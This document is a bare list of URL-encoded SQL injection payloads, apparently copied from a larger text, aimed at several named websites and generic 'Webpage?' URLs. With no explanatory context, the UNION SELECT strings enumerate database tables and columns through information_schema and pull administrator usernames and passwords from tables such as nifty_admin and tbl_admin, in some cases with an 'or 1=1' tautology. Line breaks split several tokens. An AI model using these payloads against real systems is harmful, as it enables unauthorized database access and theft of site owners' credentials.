http://www.niftybazzar.com/monthly_in_detail.php?Id=
-129%20union%20select%201,2,group_concat(admin,0x
3a,pass),4,5,6%20from%20nifty_admin
http://www.garo.cc/text.php?pageid=-
15%20union%20select%201,2,3,4,5,6,7,8,9—
Webpage?subcatid=-
40%20union%20select%20UUID(),2,3,4,5,6—
http://www.telesensory.com/product.aspx?category=por
table&id=-
1%20union%20all%20select%201,group_concat%28tab
le_name%29,3,4,5,user%28%29,7,8,database%28%29,1
0,11,12,13,14,15,16,17,18%20from%20information_sch
ema.tables%20where%20table_schema=database%28%29—
Webpage?subcatid=40%20union%20select%20fld_pass
word,2,3,4,5,6%20from%20tbl_admin%20where%20fld
_password%20=%20null%20or%20fld_password%20is
%20not%20null%3b%23
http://www.unitedpurpose.org/archive/article.php?id=-
100%20union%20select%201,2,3,group_concat(column
_name),5,6,7,8,9,10,11,12,13%20from%20information_
schema.columns%20where%20table_schema=database()—
Webpage?subcatid=40%20union%20select%20fld_pass
word,2,3,4,5,6%20from%20tbl_admin%20where%20fld
_password%20=%20null%20or%201%3d1%3b%23
http://www.garo.cc/text.php?pageid=16%20union%20se
lect%201,group_concat(table_name),3,4,5,6,7,8,9%20fr
om%20information_schema.tables%20where%20table_
schema=database()—
http://www.web.com/index.php?id=-1 union select
1,concat(user()),3,4,5,6—